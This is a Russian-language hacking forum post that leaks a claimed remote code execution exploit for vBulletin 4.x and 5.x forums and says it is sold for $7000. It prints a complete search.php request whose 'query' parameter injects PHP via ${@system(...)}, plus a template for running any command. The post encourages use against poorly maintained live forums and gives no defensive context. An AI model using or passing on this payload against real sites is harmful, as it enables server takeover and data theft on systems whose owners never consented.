Уязвимость в форумах vBulletin
Автор: Kvak | Дата: 3-03-2014, 17:19 | Комментариев: 0 | Просмотров: 10 080
На топовый форумах конечно не работает, но на школофорумах вполне. Инфа была слита давно, но тут не было!
[Информация]
-Уязвимость продается тут: 1337 day
-Уязвимые версии: vBulletin v4.x.x and 5.х.x
-Цена на офф. сайте: 7000$ (~245000 рублей)
-Распространенность на 02.03.2014: 5/5
-Платформа: PHP
-Возможности: Shell Upload / Remote Code Execute
[Продаваемая уязвимость]
search.php?ajax=0&beforeafter=after&childforums=1&exactname=1&exclude=&forumchoice=&nocache=0&query= %24%7b%40system('pwd')%7d&quicksearch=0&replyless=0&replylimit=0&saveprefs=1&searchdate=0&searchthre adid=0&searchtype=1&searchuser=1&showposts=0&sortby=rank&sortorder=descending&starteronly=0&tag=17&t itleonly=0&userid=0
# "query" param
# php code to inject : ${@system('put command here')}
ВАЖНО, для того что-бы юзать данный шел нужно иметь знания по PHP
Пароль на все архивы: hh
Уважаемый посетитель, Вы зашли на сайт как незарегистрированный пользователь.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.
Мы рекомендуем Вам зарегистрироваться либо войти на сайт под своим именем.